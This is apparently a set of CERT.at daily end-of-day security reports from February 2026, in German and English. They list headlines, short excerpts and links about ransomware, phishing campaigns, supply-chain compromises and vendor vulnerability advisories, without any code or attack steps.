Mit Phishing-Nachrichten im Namen real existierender Unternehmen versuchen Kriminelle aktuell, Schadsoftware auf die Endgeräte ihrer Opfer zu schummeln. Die erhobenen Anschuldigungen sind natürlich frei erfunden, das angehängte Dokument ist allerdings hochgefährlich.

https://www.watchlist-internet.at/news/vorsicht-trojaner-urheberrechtsverletzungen/

Urgent warnings from UK and US cyber agencies after Polish energy grid attack

A coordinated cyberattack that targeted Polands energy infrastructure in late December 2025 has prompted cybersecurity agencies to issue urgent warnings to critical national infrastructure operators on both sides of the Atlantic.

https://www.fortra.com/blog/urgent-warnings-uk-and-us-cyber-agencies-after-polish-energy-grid-attack

Naming and shaming: How ransomware groups tighten the screws on victims

When corporate data is exposed on a dedicated leak site, the consequences linger long after the attack fades from the news cycle.

https://www.welivesecurity.com/en/ransomware/naming-shaming-ransomware-groups-tighten-screws-victims/

Lawful access to encrypted data: why is this so hard to do?

As I am now a member of the EU expert group which is tasked with coming up with a solution, I have been thinking a lot about this problem. An interesting train of thought turned out to be the question -We managed to give Law Enforcement (LE) wiretapping powers in old-style phone networks, but not in modern, Internet-based communication services. Why?-

https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-why-is-this-so-hard-to-do

8,000+ ChatGPT API Keys Left Publicly Accessible

The rapid integration of artificial intelligence into mainstream software development has introduced a new category of security risk, one that many organizations are still unprepared to manage. According to research conducted by Cyble Research and Intelligence Labs (CRIL), thousands of exposed ChatGPT API keys are currently accessible across public infrastructure, dramatically lowering the barrier for abuse. CRIL identified more than 5,000 publicly accessible GitHub repositories containing

https://thecyberexpress.com/exposed-chatgpt-api-keys-github-websites/

Vulnerabilities

Jetzt patchen! Angreifer attackieren BeyondTrust-Fernwartungslösungen

Angreifer nutzen eine kritische Schadcode-Lücke in BeyondTrust Remote Support und Privileged Remote Access aus. Sicherheitspatches sind verfügbar.

https://www.heise.de/news/Jetzt-patchen-Angreifer-attackieren-BeyondTrust-Fernwartungsloesungen-11175384.html

Qnap-NAS: Unbefugte Dateisystemzugriffe möglich

Sicherheitspatches für die NAS-Betriebssysteme QTS und QuTS hero von Qnap schließen mehrere Lücken.

https://www.heise.de/news/Qnap-NAS-Unbefugte-Dateisystemzugriffe-moeglich-11175677.html

LWN Security updates for Friday

https://lwn.net/Articles/1058642/

Tageszusammenfassung - 12.02.2026

2026-02-12T19:22:45Z

End-of-Day report

Timeframe: Mittwoch 11-02-2026 18:00 - Donnerstag 12-02-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Felician Fuchs

News

Crazy ransomware gang abuses employee monitoring tool in attacks

A member of the Crazy ransomware gang is abusing legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment.

https://www.bleepingcomputer.com/news/security/crazy-ransomware-gang-abuses-employee-monitoring-tool-in-attacks/

Microsoft Store Outlook add-in hijacked to steal 4,000 Microsoft accounts

The AgreeTo add-in for Outlook has been hijacked and turned into a phishing kit that stole more than 4,000 Microsoft account credentials. [..] Office add-ins are just URLs pointing to content loaded into Microsoft products from the developer's server. In the case of AgreeTo, the developer used a Vercel-hosted URL (outlook-one.vercel.app) but abandoned the project, despite the userbase it formed. [..] The case of AgreeTo stands out, though, as it is likely the first to be hosted on Microsoft-s Marketplace.

https://www.bleepingcomputer.com/news/security/microsoft-store-outlook-add-in-hijacked-to-steal-4-000-microsoft-accounts/

Betrügerische Post-Emails im Umlauf

Rechnungen von der Post per E-Mail sind häufig Fake. Aktuell kursiert eine Variante, bei der 9,30 Euro für eine Sendung beglichen werden sollen. Ein Klick auf den Button führt auf eine Phishing-Website, auf der Kreditkartendaten gestohlen werden können.

https://www.watchlist-internet.at/news/betruegerische-post-emails-im-umlauf/

Nation-State Actors Exploit Notepad++ Supply Chain

Between June and December 2025, the official hosting infrastructure for the text editor Notepad++ was compromised by a state-sponsored threat group known as Lotus Blossom. The attackers breached the shared hosting provider-s environment. [..] We-ve identified additional unreported infrastructure, which is linked to this campaign.

https://unit42.paloaltonetworks.com/notepad-infrastructure-compromise/

Kritische Schwachstellen in diversen Routern von Linksys

Linksys-Router beinhalten Schwachstellen, die bis zu einer unauthentifizierten und vollständigen Kompromittierung der Geräte über das Internet führen. Der Hersteller Linksys hat für betroffene Geräte ein Update bereitgestellt, welches allerdings nur eine Ausnutzung über das Internet verhindert. [..] Shortly after discovering the vulnerabilities, a -quick- scan of the internet showed about 12.000 vulnerable devices. Around six months after the fix was available, this number shrunk to around 4.000. A reason for this large drop is probably because the Linksys routers support auto-update, which is enabled by default and installs new firmware updates without any user interaction.

https://www.syss.de/pentest-blog/schwachstellen-in-linksys-routern

US wants cyber partnerships to send -coordinated, strategic message- to adversaries

National Cyber Director Sean Cairncross told attendees of the Munich Cyber Security Conference that Washington is looking to deepen cooperation with partners rather than act alone.

https://therecord.media/us-wants-cyber-partnerships-to-send-message-to-adversaries

GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use

In the final quarter of 2025, Google Threat Intelligence Group (GTIG) observed threat actors increasingly integrating artificial intelligence (AI) to accelerate the attack lifecycle, achieving productivity gains in reconnaissance, social engineering, and malware development. This report serves as an update to our November 2025 findings regarding the advances in threat actor usage of AI tools.

https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use/

Scary Agent Skills: Hidden Unicode Instructions in Skills ...And How To Catch Them ·

There is a lot of talk about Skills recently, both in terms of capabilities and security concerns. However, so far I haven-t seen anyone bring up hidden prompt injection. So, I figured to demo a Skills supply chain backdoor that survives human review.

https://embracethered.com/blog/posts/2026/scary-agent-skills/

Vulnerabilities

Apple Fixes Exploited Zero-Day Affecting iOS, macOS, and Apple Devices

Apple on Wednesday released iOS, iPadOS, macOS Tahoe, tvOS, watchOS, and visionOS updates to address a zero-day flaw that it said has been exploited in sophisticated cyber attacks.

https://thehackernews.com/2026/02/apple-fixes-exploited-zero-day.html

Dell schließt unzählige Sicherheitslücken in Avamar, iDRAC und NetWorker

In drei Warnmeldungen listet Dell die nun geschlossenen Sicherheitslücken in Komponenten von Drittanbietern auf, die Avamar und NetWorker betreffen. [..] Darunter fallen Komponenten wie Apache HTTP Server, Expat, OpenSSL und Vim. Der Großteil der geschlossenen Lücken stammt aus dem Jahr 2025. Darunter sind auch -kritische- Schwachstellen (etwa Samba CVE-2025-10230), über die Schadcode auf Systeme gelangen kann.

https://www.heise.de/news/Dell-schliesst-unzaehlige-Sicherheitsluecken-in-Avamar-iDRAC-und-NetWorker-11173829.html

Fortinet: LDAP authentication bypass in Agentless VPN and FSSO

An Authentication Bypass by Primary Weakness vulnerability [CWE-305] in FortiOS fnbamd may allow an unauthenticated attacker to bypass LDAP authentication of Agentless VPN or FSSO policy, under specific LDAP server configuration. CVE-2026-22153

https://www.fortiguard.com/psirt/FG-IR-25-1052

High-Severity RCE Vulnerability Disclosed in next-mdx-remote

HashiCorp has published HCSEC-2026-01, disclosing a high-severity vulnerability in the popular next-mdx-remote library that can lead to arbitrary code execution when rendering untrusted MDX content on the server. The issue is tracked as CVE-2026-0969 (GHSA-g4xw-jxrg-5f6m) and carries a CVSS 3.1 score of 8.8 (High). [..] It is fixed in version 6.0.0. [..] For clarity, this is not a vulnerability in Next.js itself. It affects applications that use next-mdx-remote to compile untrusted MDX content on the server.

https://socket.dev/blog/high-severity-rce-vulnerability-disclosed-in-next-mdx-remote

Multiple Vulnerabilities in various Solax Power Pocket WiFi models

https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-various-solax-power-pocket-wifi-models/

LWN Security updates for Thursday

https://lwn.net/Articles/1058473/

Tageszusammenfassung - 11.02.2026

2026-02-11T19:13:57Z

End-of-Day report

Timeframe: Dienstag 10-02-2026 18:00 - Mittwoch 11-02-2026 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs

News

New Linux botnet SSHStalker uses old-school IRC for C2 comms

A newly documented Linux botnet named SSHStalker is using the IRC (Internet Relay Chat) communication protocol for command-and-control (C2) operations.

https://www.bleepingcomputer.com/news/security/new-linux-botnet-sshstalker-uses-old-school-irc-for-c2-comms/

In Bypassing MFA, ZeroDayRAT Is Textbook Stalkerware

With access to SIM, location data, and a preview of recent SMSes, attackers have everything they need for account takeover or targeted social engineering.

https://www.darkreading.com/threat-intelligence/zerodayrat-brings-commercial-spyware-to-mass-market

DPRK Operatives Impersonate Professionals on LinkedIn to Infiltrate Companies

The information technology (IT) workers associated with the Democratic Peoples Republic of Korea (DPRK) are now applying to remote positions using real LinkedIn accounts of individuals theyre impersonating, marking a new escalation of the fraudulent scheme.

https://thehackernews.com/2026/02/dprk-operatives-impersonate.html

Kimwolf Botnet Swamps Anonymity Network I2P

For the past week, the massive "Internet of Things" (IoT) botnet known as Kimwolf has been disrupting the The Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnets control servers.

https://krebsonsecurity.com/2026/02/kimwolf-botnet-swamps-anonymity-network-i2p/

Shelly IoT door controller config fail: leaving your garage, home and security exposed

I love my Shelly devices. They are an essential part of my smart home setup. I use them for everything from lights and plugs to garage doors and garden sprinkler control! One of the first Shelly devices I installed about five years ago recently stopped working, so I replaced it with one of their new fourth-generation Shelly 1 devices. That-s when I noticed an issue I hadn-t seen in previous generations.

https://www.pentestpartners.com/security-blog/shelly-iot-door-controller-config-fail-leaving-your-garage-home-and-security-exposed/

Recovery Scam: Wie Betrugsopfer erneut geschädigt werden

Durch Onlinebetrug verlorenes Geld zurückzuholen, das wünschen sich viele Opfer. Und genau diesen Wunsch versuchen Kriminelle für ihre Zwecke zu nutzen. Mit dem sogenannten -Recovery Scam- ziehen sie bereits Geschädigten zusätzlich Geld aus der Tasche. Im Beispielfall geht es um angeblich wiedergefundene Krypto-Assets und für die Rücküberweisung notwendige Vorauszahlungen. Der Köder: Die Website betrugsrecht(.)de.

https://www.watchlist-internet.at/news/recovery-scam-erneut-geschaedigt/

A Peek Into Muddled Libra-s Operational Playbook

Explore the tools Unit 42 found on a Muddled Libra rogue host. Learn how they target domain controllers and use search engines to aid their attacks.

https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/

Cybersicherheit Zuhause: Privathaushalte als unterschätzte Angriffsfläche

Smartphones, Smarthome-Systeme, Cloud-Dienste und vernetzte Haushaltsgeräte sind längst fester Bestandteil des Alltags. Doch während Unternehmen und Behörden auf etablierte Standards, definierte Prozesse und vorhandene Expertise setzen können, bleibt IT-Sicherheit im privaten Umfeld meistens ungeregelt: Unzureichendes Knowhow, geteilte Passwörter und eine unsichere Konfiguration der gemeinsam genutzten Geräte erhöhen in vielen Familien und Wohngemeinschaften das digitale Risiko erheblich.

https://certitude.consulting/blog/de/cybersicherheit-zuhause-privathaushalte-als-unterschatzte-angriffsflache/

Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure

This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre-s (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally.

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-343a

Love Is in the Air - and So Are Scammers: Valentine-s Day 2026 Threats to Watch For

As Valentine-s Day 2026 approaches, people are turning to online shopping, digital dating, and last-minute gift ideas. Unfortunately, cyber criminals are doing the same. Check Point researchers have identified a sharp rise in Valentine-themed phishing websites, fraudulent stores, and fake dating platforms designed to steal personal data and payment information.

https://blog.checkpoint.com/research/love-is-in-the-air-and-so-are-scammers-valentines-day-2026-threats-to-watch-for/

Active Ivanti Exploitation Traced to Single Bulletproof IP-Published IOC Lists Point Elsewhere

The GreyNoise Global Observation Grid observed active exploitation of two critical Ivanti Endpoint Manager Mobile vulnerabilities, and 83% of that exploitation traces to a single IP address on bulletproof hosting infrastructure that does not appear on widely circulated IOC lists.

https://www.greynoise.io/blog/active-ivanti-exploitation

Hope Is Not a Security Strategy: Why Secure-by-Default Beats Hardening

Security has always assumed deterministic behavior. We can-t write policy to prevent bad outcomes when we don-t even know what the agent will do. Sandboxing is the natural answer: everyone is buying Mac Minis to run Moltbot (OpenClaw now), Docker is using microVMs for coding agent sandboxes, and countless projects offer sandboxing tools for AI agents.

https://tuananh.net/2026/02/09/hope-is-not-a-security-strategy/

Vulnerabilities

Sicherheitslücken: Attacken auf Windows, Office und den Internet Explorer

Der Februar fällt im Hinblick auf die Anzahl der zum Microsoft-Patchday geschlossenen Sicherheitslücken wieder etwas milder aus als der Januar. Jedoch befinden sich darunter gleich sechs Lücken, die bereits aktiv ausgenutzt werden. Betroffen sind nicht nur Windows-Systeme, sondern ebenso Microsoft Office und der totgeglaubte Internet Explorer. Nutzer sollten zügig patchen, um sich zu schützen.

https://www.golem.de/news/microsoft-patchday-zero-day-luecken-in-windows-office-und-im-internet-explorer-2602-205258.html

Patchday bei Adobe: After Effects & Co. für Schadcode-Attacken anfällig

Sicherheitspatches schließen mehrere Schwachstellen in Anwendungen von Adobe. Bislang gibt es keine Berichte zu Attacken.

https://www.heise.de/news/Patchday-bei-Adobe-After-Effects-Co-fuer-Schadcode-Attacken-anfaellig-11172390.html

800,000 WordPress Sites Affected by Arbitrary File Upload Vulnerability in WPvivid Backup WordPress Plugin

On January 12th, 2026, we received a submission for an Arbitrary File Upload vulnerability in WPvivid Backup, a WordPress plugin with more than 800,000 active installations. This vulnerability can be used by unauthenticated attackers to upload arbitrary files to a vulnerable site and achieve remote code execution, which is typically leveraged for a complete site takeover.

https://www.wordfence.com/blog/2026/02/800000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-wpvivid-backup-wordpress-plugin/

TP-Link Systems Inc. VIGI Series IP Camera

Successful exploitation of this vulnerability could result in unauthorized users gaining administrative access to affected closed circuit television cameras.

https://www.cisa.gov/news-events/ics-advisories/icsa-26-036-01

LWN Security updates for Wednesday

https://lwn.net/Articles/1058265/

Tageszusammenfassung - 10.02.2026

2026-02-10T18:40:14Z

End-of-Day report

Timeframe: Montag 09-02-2026 18:00 - Dienstag 10-02-2026 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs

News

Hackers breach SmarterTools network using flaw in its own software

SmarterTools confirmed last week that the Warlock ransomware gang breached its network after compromising an email system, but did not impact business applications or account data.

https://www.bleepingcomputer.com/news/security/hackers-breach-smartertools-network-using-flaw-in-its-own-software/

ZeroDayRAT malware grants full access to Android, iOS devices

A new commercial mobile spyware platform dubbed ZeroDayRAT is being advertised to cybercriminals on Telegram as a tool that provides full remote control over compromised Android and iOS devices.

https://www.bleepingcomputer.com/news/security/zerodayrat-malware-grants-full-access-to-android-ios-devices/

Trojaner an Bord: Mit Schadcode verseuchte 7-Zip-Version in Umlauf

Wer das Packprogramm 7-Zip herunterlädt, sollte dringend auf die korrekte Domain achten. Eine mit Malware verseuchte Version wurde gesichtet.

https://www.golem.de/news/trojaner-an-bord-mit-schadcode-verseuchte-7-zip-versionen-in-umlauf-2602-205223.html

Dutch Authorities Confirm Ivanti Zero-Day Exploit Exposed Employee Contact Data

The Netherlands Dutch Data Protection Authority (AP) and the Council for the Judiciary confirmed both agencies (Rvdr) have disclosed that their systems were impacted by cyber attacks that exploited the recently disclosed security flaws in Ivanti Endpoint Manager Mobile (EPMM), according to a notice sent to the countrys parliament on Friday.

https://thehackernews.com/2026/02/dutch-authorities-confirm-ivanti-zero.html

Reynolds Ransomware Embeds BYOVD Driver to Disable EDR Security Tools

Cybersecurity researchers have disclosed details of an emergent ransomware family dubbed Reynolds that comes embedded with a built-in bring your own vulnerable driver (BYOVD) component for defense evasion purposes within the ransomware payload itself.

https://thehackernews.com/2026/02/reynolds-ransomware-embeds-byovd-driver.html

More than 135,000 OpenClaw instances exposed to internet in latest vibe-coded disaster

By default, the bot listens on all network interfaces, and many users never change it Its a day with a name ending in Y, so you know what that means: Another OpenClaw cybersecurity disaster.

https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/

Introducing Augustus: Open Source LLM Prompt Injection Tool

Last month we released Julius, a tool that answers the question: -what LLM service is running on this endpoint?- Julius identifies the infrastructure. But identification is only the first step. The natural follow-up: -now that I know what-s running, how do I test whether it-s secure?- That-s what Augustus does.

https://www.praetorian.com/blog/introducing-augustus-open-source-llm-prompt-injection/

Jetzt patchen! Abermals Attacken auf SolarWinds Web Help Desk beobachtet

Sicherheitsforschern zufolge nutzen Angreifer derzeit kritische Schadcode-Lücken in SolarWinds Web Help Desk aus.

https://www.heise.de/news/Jetzt-patchen-Abermals-Attacken-auf-SolarWinds-Web-Help-Desk-beobachtet-11170887.html

Archive.today: Betreiber setzt Nutzer für DDoS-Attacke ein

Der Betreiber von Archive.today setzt Besucher seiner Seite unwissentlich für eine DDoS-Attacke. Betroffener ist ein finnischer Blogger.

https://www.heise.de/news/Archive-today-Betreiber-setzt-Nutzer-fuer-DDoS-Attacke-ein-11170623.html

North Korean hackers targeted crypto exec with fake Zoom meeting, ClickFix scam

The scam involved a ClickFix attack where hackers install malware on a device by having the victim try to resolve fictitious technical issues.

https://therecord.media/north-korean-hackers-targeted-crypto-exec-clickfix

Pride Month Phishing Targets Employees via Trusted Email Services

Attackers are using Pride Month themed phishing emails to target employees worldwide, abusing trusted email platforms like SendGrid to harvest credentials.

https://hackread.com/pride-month-phishing-employees-trusted-email-services/

New Cybercrime Group 0APT Accused of Faking Hundreds of Breach Claims

Researchers reveal the new 0APT cyber group is fabricating attacks on large organisations. Learn how they use fake data to trick companies into paying.

https://hackread.com/cybercrime-group-0apt-faking-breach-claims/

Beyond the Battlefield: Threats to the Defense Industrial Base

Introduction In modern warfare, the front lines are no longer confined to the battlefield; they extend directly into the servers and supply chains of the industry that safeguards the nation. Today, the defense sector faces a relentless barrage of cyber operations conducted by state-sponsored actors and criminal groups alike.

https://cloud.google.com/blog/topics/threat-intelligence/threats-to-defense-industrial-base/

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps

The purpose of this Alert is to amplify Poland-s Computer Emergency Response Team (CERT Polska-s) Energy Sector Incident Report published on Jan. 30, 2026, and highlight key mitigations for Energy Sector stakeholders.

https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps

Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails

FortiGuard Labs recently captured a phishing campaign in the wild delivering a new variant of XWorm. XWorm is a multi-functional Remote Access Trojan (RAT) first identified in 2022 that remains actively distributed, including through Telegram-based marketplaces. Once deployed, it provides attackers with full remote control of compromised Windows systems.

https://feeds.fortinet.com/~/945702296/0/fortinet/blogs~Deep-Dive-into-New-XWorm-Campaign-Utilizing-MultipleThemed-Phishing-Emails

Tech impersonators: ClickFix and MacOS infostealers

Datadog identified an active campaign employing fake GitHub repositories impersonating software companies and leveraging the ClickFix initial access technique to deliver macOS infostealers.

https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/

Vulnerabilities

Security updates for Tuesday

Security updates have been issued by AlmaLinux (fence-agents, firefox, fontforge, freerdp, kernel-rt, keylime, libsoup, libsoup3, nodejs22, nodejs24, opentelemetry-collector, osbuild-composer, python3.12-wheel, qemu-kvm, resource-agents, thunderbird, and util-linux), Debian (kernel, rlottie, shaarli, and usbmuxd), Fedora (asciinema, atuin, bustle, cef, envision, glycin, greetd, helix, java-21-openjdk, java-25-openjdk, java-latest-openjdk, keylime-agent-rust, maturin, mirrorlist-server, ntpd-rs, python3.6, rust-add-determinism, rust-afterburn, rust-ambient-id, rust-app-store-connect, rust-bat, rust-below, rust-btrd, rust-busd, rust-bytes, rust-cargo-c, rust-cargo-deny, rust-coreos-installer, rust-crypto-auditing-agent, rust-crypto-auditing-client, rust-crypto-auditing-event-broker, rust-crypto-auditing-log-parser, rust-dua-cli, rust-eif_build, rust-git-delta, rust-git-interactive-rebase-tool, rust-git2, rust-gst-plugin-dav1d, rust-gst-plugin-reqwest, rust-heatseeker, rust-ingredients, rust-jsonwebtoken, rust-lsd, rust-monitord, rust-monitord-exporter, rust-muvm, rust-nu, rust-num-conv, rust-onefetch, rust-oo7-cli, rust-pleaser, rust-pore, rust-pretty-git-prompt, rust-procs, rust-rbspy, rust-rbw, rust-rd-agent, rust-rd-hashd, rust-redlib, rust-resctl-bench, rust-resctl-demo, rust-routinator, rust-sccache, rust-scx_layered, rust-scx_rustland, rust-scx_rusty, rust-sequoia-chameleon-gnupg, rust-sequoia-keystore-server, rust-sequoia-octopus-librnp, rust-sequoia-sq, rust-sevctl, rust-shadow-rs, rust-sigul-pesign-bridge, rust-snpguest, rust-speakersafetyd, rust-tealdeer, rust-time, rust-time-core, rust-time-macros, rust-tokei, rust-weezl, rust-wiremix, rust-ybaas, rustup, sad, tbtools, tuigreet, and uv), Mageia (fontforge and nginx), Oracle (firefox, fontforge, freerdp, kernel, keylime, libsoup, python, thunderbird, and uek-kernel), SUSE (abseil-cpp and kernel), and Ubuntu (freerdp2 and libsoup3).

https://lwn.net/Articles/1057993/

XSS via back button

An Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) vulnerability [CWE-79] in FortiSandbox may allow an unauthenticated attacker to execute commands via crafted requests. FortiSandbox PaaS versions 4.4.8 and 5.0.5 contains the fix for this vulnerability.

https://fortiguard.fortinet.com/psirt/FG-IR-25-093

Schwerwiegende Schwachstellen in Google Looker aufgedeckt

Noch ein kleiner Nachtrag zu einer Information, die mich vor einigen Tagen erreichte. Sicherheitsforscher von Tenable Research habe zwei schwerwiegende Sicherheitslücken in in Google Looker entdeckt und als "LookOut" bezeichnet. Angreifer können ganze Systeme kapern, um Firmengeheimnisse zu stehlen.

https://borncity.com/blog/2026/02/09/schwerwiegende-schwachstellen-in-google-looker-aufgedeckt/

February 2026 Security Update

Ivanti releases standard security patches on the second Tuesday of every month. Our vulnerability management program is central to our commitment to maintaining secure products. Our philosophy is simple: discovering and communicating vulnerabilities, and sharing that information with defenders, is not an indication of weakness; rather it is evidence of rigorous scrutiny and a proactive vulnerability management program.

https://www.ivanti.com/blog/february-2026-security-update

Roundcube 1.7 RC3 released

We just published the third release candidate for the next major version 1.7 of Roundcube webmail. This release fixes two security issues, and contains a few more fixes for several issues.

https://roundcube.net/news/2026/02/09/roundcube-1.7-rc3-released

Attacken auf BeyondTrust Remote Support und Privileged Remote Access möglich

Zwei Fernwartungslösungen von BeyondTrust sind verwundbar. Sicherheitsupdates schließen eine kritische Lücke.

https://heise.de/-11171444

SAP Security Patch Day February 2026

SAP has released its February 2026 security patch package containing 27 security notes addressing critical vulnerabilities across enterprise SAP environments. This release includes two HotNews vulnerabilities with CVSS ratings up to 9.9, seven High priority issues, sixteen Medium priority fixes, and two Low priority updates.

https://redrays.io/blog/sap-security-patch-day-february-2026/

Yokogawa FAST/TOOLS

https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-01

AVEVA PI Data Archive

https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-03

ZLAN Information Technology Co. ZLAN5143D

https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-02

Tageszusammenfassung - 09.02.2026

2026-02-09T18:31:49Z

End-of-Day report

Timeframe: Freitag 06-02-2026 18:00 - Montag 09-02-2026 18:00 Handler: Alexander Riepl Co-Handler: Guenes Holler

News

Datenabfluss vermutet: Cyberangriff trifft EU-Kommission

Hackern ist ein Cyberangriff auf die EU-Kommission gelungen. Angriffspunkt war ein System zur Verwaltung mobiler Endgeräte - vermutlich von Ivanti.

https://www.golem.de/news/datenabfluss-moeglich-cyberangriff-trifft-eu-kommission-2602-205154.html

TeamPCP Worm Exploits Cloud Infrastructure to Build Criminal Infrastructure

Cybersecurity researchers have called attention to a "massive campaign" that has systematically targeted cloud native environments to set up malicious infrastructure for follow-on exploitation.

https://thehackernews.com/2026/02/teampcp-worm-exploits-cloud.html

Technical Analysis of GuLoader Obfuscation Techniques

In this blog post, Zscaler ThreatLabz explores the anti-analysis techniques that GuLoader employs including polymorphic code to dynamically construct constant and string values, as well as complex exception-based control flow obfuscation.

https://www.zscaler.com/blogs/security-research/technical-analysis-guloader-obfuscation-techniques

Novel Technique to Detect Cloud Threat Actor Operations

Cloud-based alerting systems often struggle to distinguish between normal cloud activity and targeted malicious operations by known threat actors. The difficulty doesn-t lie in an inability to identify complex alerting operations across thousands of cloud resources or in a failure to follow identity resources, the problem lies in the accurate detection of known persistent threat actor group techniques specifically within cloud environments.

https://unit42.paloaltonetworks.com/tracking-threat-groups-through-cloud-logging/

KI-Assistent OpenClaw bekommt VirusTotal an die Seite

Der Entwickler von OpenClaw beabsichtigt mit einer VirusTotal-Partnerschaft die Verbreitung von Malware-Skills einzudämmen.

https://heise.de/-11169414

Evaluating and mitigating the growing risk of LLM-discovered 0-days

Claude Opus 4.6, released today, continues a trajectory of meaningful improvements in AI models- cybersecurity capabilities. Last fall, we wrote that we believed we were at an inflection point for AI's impact on cybersecurity-that progress could become quite fast, and now was the moment to accelerate defensive use of AI. The evidence since then has only reinforced that view. AI models can now find high-severity vulnerabilities at scale. Our view is this is a moment to move quickly-to empower defenders and secure as much code as possible while the window exists.

https://red.anthropic.com/2026/zero-days/

Vulnerabilities

Security updates for Monday

Security updates have been issued by AlmaLinux (fontforge, kernel, and osbuild-composer), Debian (debian-security-support, sudo, wireshark, xrdp, and zabbix), Fedora (bind, bind-dyndb-ldap, chromium, k9s, libgit2, mingw-glib2, node-exporter, open-vm-tools, plantuml, xorgxrdp, and xrdp), Oracle (fence-agents, image-builder, kernel, libsoup3, and osbuild-composer), Red Hat (image-builder and osbuild-composer), Slackware (openssl and p11), SUSE (chromium, cockpit-354, cockpit-machines, cockpit-machines-346, cockpit-packages, cockpit-podman, cockpit-subscriptions, govulncheck-vulndb, kubernetes-old, libsnmp45-32bit, libxml2, localsearch, micropython, opencloud-server, python-django, python-djangorestframework, python-maturin, python311-Django, python311-wheel, python315, sqlite3, and xrdp), and Ubuntu (linux-fips, linux-aws-fips, linux-gcp-fips and python-pip).

https://lwn.net/Articles/1057759/

Ivanti EPMM (CVE-2026-1281 & CVE-2026-1340) Exploitation Detection RPM Package

Ivanti has released updates for Endpoint Manager Mobile (EPMM) which addresses two critical severity vulnerabilities. Successful exploitation could lead to unauthenticated remote code execution. We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure.

https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US

BeyondTrust warns of critical RCE flaw in remote support software

BeyondTrust warned customers to patch a critical security flaw in its Remote Support (RS) and Privileged Remote Access (PRA) software that could allow unauthenticated attackers to execute arbitrary code remotely.

https://www.bleepingcomputer.com/news/security/beyondtrust-warns-of-critical-rce-flaw-in-remote-support-software/

Microsoft kümmert sich um kritische Sicherheitslücke im Azure-Umfeld

Microsofts Multi-Cloud-Verwaltungslösung Azure Arc, die serverlose Entwicklungsumgebung Azure Functions und das Content Delivery Network (CDN) Azure Front Door waren verwundbar. Das Technologieunternehmen stuft die Gefahr insgesamt als kritisch ein.

https://www.heise.de/news/Microsoft-kuemmert-sich-um-kritische-Sicherheitsluecke-im-Azure-Umfeld-11169145.html

Schadcode-Lücke in FortiClient EMS kann PCs kompromittieren

Admins, die in Firmen Computer mit FortiClient Endpoint Management Server (EMS) verwalten, sollten die Anwendung aus Sicherheitsgründen zeitnah auf den aktuellen Stand bringen. Eine Schwachstelle in einer bestimmten Version kann Schadcode auf Systeme lassen.

https://heise.de/-11170228

Security updates 1.6.13 and 1.5.13 released

We just published security updates to the 1.6 and 1.5 LTS versions of Roundcube Webmail. They both contain fixes for recently reported two security vulnerabilities.

https://roundcube.net/news/2026/02/08/security-updates-1.6.13-and-1.5.13

Firewalls und mehr: Fast 4.000 deutsche Edge-Devices hängen ohne Support im Netz

Deutsche Organisationen betreiben Tausende angreifbarer Edge-Devices wie Firewalls und VPN-Appliances. Es besteht dringender Handlungsbedarf.

https://www.golem.de/news/firewalls-und-mehr-fast-4-000-deutsche-edge-devices-haengen-ohne-support-im-netz-2602-205159.html

Tageszusammenfassung - 06.02.2026

2026-02-06T18:14:37Z

End-of-Day report

Timeframe: Donnerstag 05-02-2026 18:00 - Freitag 06-02-2026 18:00 Handler: Guenes Holler Co-Handler: Alexander Riepl

News

No Pain, No Gain - How Impunity Perpetuates Failure

It-s time to treat cybersecurity incidents and data breaches like preventable disasters, not the inevitable cost of doing business.

https://bytesandborscht.com/no-pain-no-gain-how-impunity-perpetuates-failure/

Ransomware gang uses ISPsystem VMs for stealthy payload delivery

Ransomware operators are hosting and delivering malicious payloads at scale by abusing virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider.

https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-ispsystem-vms-for-stealthy-payload-delivery/

Spains Ministry of Science shuts down systems after breach claims

Spain's Ministry of Science (Ministerio de Ciencia) announced a partial shutdown of its IT systems, affecting several citizen- and company-facing services.

https://www.bleepingcomputer.com/news/security/spains-ministry-of-science-shuts-down-systems-after-breach-claims/

CISA orders federal agencies to replace end-of-life edge devices

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a new binding operational directive requiring federal agencies to identify and remove network edge devices that no longer receive security updates from manufacturers.

https://www.bleepingcomputer.com/news/security/cisa-orders-federal-agencies-to-replace-end-of-life-edge-devices/

Compromised dYdX npm and PyPI Packages Deliver Wallet Stealers and RAT Malware

